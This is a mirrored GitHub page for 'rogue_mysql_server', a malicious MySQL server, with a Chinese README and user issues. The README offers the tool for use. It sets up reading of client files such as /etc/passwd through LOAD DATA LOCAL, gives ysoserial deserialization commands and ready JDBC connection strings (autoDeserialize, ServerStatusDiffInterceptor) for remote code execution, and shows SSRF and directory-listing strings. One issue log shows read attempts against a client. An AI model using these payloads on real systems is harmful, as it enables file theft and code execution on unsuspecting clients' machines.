rmb122 / rogue_mysql_server Goto Github PK

View Code? Open in Web Editor NEW

663.0 6.0 75.0 268 KB

A rouge mysql server supports reading files from most mysql libraries of multiple programming languages.

License: MIT License

Go 99.77% Java 0.12% Shell 0.01% PHP 0.05% Python 0.02% Makefile 0.02%

expliot mysql vulnerability

rogue_mysql_server's Introduction

Rogue Mysql Server

English README

基于 https://github.com/vitessio/vitess 实现的恶意 mysql 服务器, 支持利用漏洞从 go, php, python, java, 原生命令行等多种语言下的常见 mysql 库中读取文件.
远离恼人的兼容性问题, 测试过的客户端见下表

language	library	pass
go	github.com/go-sql-driver/mysql	✔️
php	mysqli, pdo	✔️
python	pymysql	✔️
java	mysql-connector-java	✔️
native	10.4.13-MariaDB	✔️

觉得好用可以点右上方的 🌟 支持作者

功能

可以兼容多种 mysql 客户端
可以读取二进制文件
自动保存文件
作为蜜罐使用时, 可选择开启帐号密码验证
读取客户端的 ConnAttr, 可能会包含一些客户端的额外信息
对于 mysql-connector-java, 在可控链接串的情况下可以利用反序列化漏洞进行 RCE

使用

在当前目录下生成配置文件模版, 如果已有配置文件可以跳过这一步

./rogue_mysql_server -generate

运行服务器, 使用刚刚生成的 config.yaml

./rogue_mysql_server

或者手动指定配置路径

./rogue_mysql_server -config other_config.yaml

配置文件

示例:

host: 0.0.0.0
port: 3306
# 监听的 IP 和端口.

version_string: "10.4.13-MariaDB-log"
# 客户端得到的服务端版本信息.

file_list: ["/etc/passwd", "C:/boot.ini"]
save_path: ./loot
# 需要读取的文件, 注意这个不意味着一次性读取列表中的所有文件 (很多客户端实现不支持这种操作).
# 而是客户端每执行一次语句, 按照列表中的顺序读取一个文件, 并保存到 `save_path` 文件夹中.

always_read: true
# 如果为 true, 那么不管客户端是否标记自己支持 LOAD DATA LOCAL, 都会尝试去读取文件, 否则会根据客户端的标记来决定是否读取, 避免客户端请求不同步.

from_database_name: false
# 如果为 true, 将会从客户端设定中的数据库名称中提取要读取的文件.
# 例如链接串为 `jdbc:mysql://localhost:3306/%2fetc%2fhosts?allowLoadLocalInfile=true`.
# 将会从客户端读取 `/etc/hosts` 而不会遵循 `file_list` 中的设置.

max_file_size: 0
# 读取文件的最大大小 (单位 byte), 超过这个大小的文件内容将会被忽略. 如果 <= 0, 代表没有限制.

auth: false
users:
  - root: root
  - root: password
# 对应是否开启验证, 如果为 `false`, 那么不管输什么密码或者不输入密码都可以登录.
# 如果为 `true`, 则需要帐号密码匹配下面的设置的帐号密码中的一条.

jdbc_exploit: false
always_exploit: false
ysoserial_command:
  cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
  cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']
# 见 `jdbc 利用相关` 一节

mysql-connector-java 反序列化漏洞利用相关

在版本 >= 8.0.20, >= 5.1.49 中, 此漏洞已经被修复,
https://github.com/mysql/mysql-connector-j/commit/de7e1af306ffbb8118125a865998f64ee5b35b1b
https://github.com/mysql/mysql-connector-j/commit/13f06c38fb68757607c460789196e3f798d506f2

与 mysql-connector-java 反序列化漏洞利用相关的配置如下

jdbc_exploit: false
always_exploit: false
ysoserial_command:
  cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
  cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']

jdbc_exploit 代表这个功能开启, 在检测到客户端是 mysql-connector-j 的情况下会自动利用. 利用和读取文件只能同时开启一项, 开启利用会导致无法读取客户端的文件.
always_exploit 代表不检测客户端是否为 mysql-connector-java, 总是开启漏洞利用.
ysoserial_command 生成反序列化 payload 的命令.

可以使用连接串中的 connectionAttributes 选项来指定需要使用的 payload, 这个选项可以指定任意连接属性. 服务器会读取连接属性中 t 的值来寻找对应的 payload. 如果未指定, 则默认使用提供的所有 payload 中的第一个.

例如, 如果使用上述的示例配置:
在 8.x 版本下要使用 cc7, 连接串为 jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:cc7&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password

另外需要注意只支持 com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor 的利用方法, 可以参考下表:

version	jdbc connection string
8.x	jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password
6.x	jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password
>=5.1.11	jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password

另外如果需要读文件, mysql-connector-java 支持使用 file:// 列目录 (当然其他协议, 例如 http 来 SSRF 也是可以的), 但是需要在 allowLoadLocalInfile 为 true 之外, 额外指定 allowUrlInLocalInfile 为 true, 详情见这里
E.g.

列 / 目录, jdbc:mysql://127.0.0.1:3306/file%3A%2F%2F%2F?allowLoadLocalInfile=true&allowUrlInLocalInfile=true
SSRF http://127.0.0.1:25565, jdbc:mysql://127.0.0.1:3306/http%3A%2F%2F127.0.0.1:25565?allowLoadLocalInfile=true&allowUrlInLocalInfile=true

Ref

mysql-connector-java 漏洞利用:
https://github.com/fnmsd/MySQL_Fake_Server

rogue_mysql_server's People

Contributors

Stargazers

Watchers

Forkers

fhgzs heartway iiiusky coffeehb bbghunter daybr4ak simlelcf r4b3rt eason-a8 icysun nan3r fbion secoba kungia09 silentsoul04 windows1988 p0desta fadinglr lzb960827 pyking n4ttt n0maj1o24 yekainew arnoldqqq phil-fly lzy1102 izj007 sry309 ajinwu daveqqq diggid4ever jidoer balalah yangbh z0edff0x3d dirchen-admin ekixu 1nhann nanaao sftrwo dummykitty ctrlaltdelet 5l1v3r1 little-gu atlassion raspberryhusky anqisec raindouble chi1ld meowwbox gysf666 trackscorer nnnnnr carr0t2 juneman brianwei1997 mmioimm cckuailong mssky9527 dzero57 secloop sobinge devil-baal lz1998 am-ev xiaobai219 tovd-go yemoli sstongxu xia0le estamelgg y1nglamore

rogue_mysql_server's Issues

Go1.15 运行失败

command-line-arguments

./main.go:194:43: undefined: schemaToFields
./main.go:194:58: undefined: Schema
./main.go:198:37: undefined: rowToSQL
./main.go:198:46: undefined: Row
./main.go:203:18: undefined: getMysqlVars

LOAD DATA LOCAL INFILE forbidden

尝试了adminer phpmyadmin navicat 都报如下错误

LOAD DATA LOCAL INFILE forbidden

windows 客户端读取失败了

直接异常了

不会按照顺序依次读取文件

配置file_list: ["/etc/passwd", "C:/boot.ini"]

使用windows客户端连接mysql,只会读取/etc/passwd，文件不存在就不会继续读取c:/boot.ini文件

读取文件不存在导致程序卡住

config.yaml中file_list: ["/etc/passwd", "C:/boot.ini",”xxxxxx“]，当某个文件不存在时读取导致程序卡住以至于无法读取后面的文件，尝试跳过没有解决，请问有没有好的解决思路

time="2021-08-04 14:01:56" level=info msg="Server started at [0.0.0.0:3306]"
time="2021-08-04 14:02:31" level=info msg="New client from addr [[::1]:1037] logged in with username [root], ID [1]"
time="2021-08-04 14:02:31" level=info msg="==== ATTRS ===="
time="2021-08-04 14:02:31" level=info msg="[_thread]: [12980]"
time="2021-08-04 14:02:31" level=info msg="[_platform]: [AMD64]"
time="2021-08-04 14:02:31" level=info msg="[_client_version]: [10.1.46]"
time="2021-08-04 14:02:31" level=info msg="[_os]: [Win64]"
time="2021-08-04 14:02:31" level=info msg="[_client_name]: [libmysql]"
time="2021-08-04 14:02:31" level=info msg="[pid]: [21632]"
time="2021-08-04 14:02:31" level=info msg="==============="
time="2021-08-04 14:02:31" level=info msg="Client from addr [[::1]:1037], ID [1] try to query [SET NAMES utf8mb4]"
time="2021-08-04 14:02:31" level=info msg="Now try to read file [/etc/passwd] from addr [[::1]:1037], ID [1]"
time="2021-08-04 14:02:31" level=info msg="Read failed, file may not exist in client"
time="2021-08-04 14:02:31" level=info msg="Client from addr [[::1]:1037], ID [1] try to query [SHOW VARIABLES LIKE 'lower_case%']"
time="2021-08-04 14:02:31" level=info msg="Now try to read file [C:/boot.ini] from addr [[::1]:1037], ID [1]"
time="2021-08-04 14:02:31" level=info msg="Read failed, file may not exist in client"
time="2021-08-04 14:02:31" level=info msg="Client from addr [[::1]:1037], ID [1] try to query [ SHOW VARIABLES LIKE 'sql_mode']"

java jdbc 8.0.x 读不到文件

报错信息如下“

Exception in thread "main" java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '/* mysql-connector-java-8.0.17 (Revision: 16a712ddb3f826a1933ab42b0039f7fb9eebc6ec) */SELECT  @@session.auto_increment_increment AS auto_increment_increment, @@character_set_client AS character_set_client, @@character_set_connection AS character_set_connection, @@character_set_results AS character_set_results, @@character_set_server AS character_set_server, @@collation_server AS collation_server, @@collation_connection AS collation_connection, @@init_connect AS init_connect, @@interactive_timeout AS interactive_timeout, @@license AS license, @@lower_case_table_names AS lower_case_table_names, @@max_allowed_packet AS max_allowed_packet, @@net_write_timeout AS net_write_timeout, @@performance_schema AS performance_schema, @@sql_mode AS sql_mode, @@system_time_zone AS system_time_zone, @@time_zone AS time_zone, @@transaction_isolation AS transaction_isolation, @@wait_timeout AS wait_timeout' at line 1
 at com.mysql.cj.jdbc.exceptions.SQLError.createSQLException(SQLError.java:120)
 at com.mysql.cj.jdbc.exceptions.SQLError.createSQLException(SQLError.java:97)
 at com.mysql.cj.jdbc.exceptions.SQLExceptionsMapping.translateException(SQLExceptionsMapping.java:122)
 at com.mysql.cj.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:827)
 at com.mysql.cj.jdbc.ConnectionImpl.<init>(ConnectionImpl.java:447)
 at com.mysql.cj.jdbc.ConnectionImpl.getInstance(ConnectionImpl.java:237)
 at com.mysql.cj.jdbc.NonRegisteringDriver.connect(NonRegisteringDriver.java:199)
 at java.sql.DriverManager.getConnection(DriverManager.java:664)
 at java.sql.DriverManager.getConnection(DriverManager.java:247)
 at Test.main(Test.java:12)

服务端日志如下，可以看到连接信息，但是读不到文件

部分库以及失效，无法编译

go: downloading vitess.io/vitess v3.0.0-rc.3.0.20190602171040-12bfde34629c+incompatible
go: downloading golang.org/x/net v0.0.0-20200602114024-627f9648deb9
rogue_mysql_server imports
vitess.io/vitess/go/sqltypes: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
golang.org/x/net/context: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/bucketpool: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/netutil: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/stats: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/sync2: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/tb: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/proto/binlogdata: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/proto/query: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/proto/replicationdata: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/proto/vtrpc: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/sqlparser: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/vterrors: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/vttls: zip: not a valid zip file

编译失败

mysql/slave_status.go:45:23: unknown field 'SlaveIoRunning' in struct literal of type replicationdata.Status
mysql/slave_status.go:46:24: unknown field 'SlaveSqlRunning' in struct literal of type replicationdata.Status
mysql/slave_status.go:62:31: s.SlaveIoRunning undefined (type *replicationdata.Status has no field or method SlaveIoRunning)
mysql/slave_status.go:63:31: s.SlaveSqlRunning undefined (type *replicationdata.Status has no field or method SlaveSqlRunning)

在 vitess库里面没有这两个字段 https://github.com/vitessio/vitess/blob/master/go/vt/proto/replicationdata/replicationdata.pb.go#L52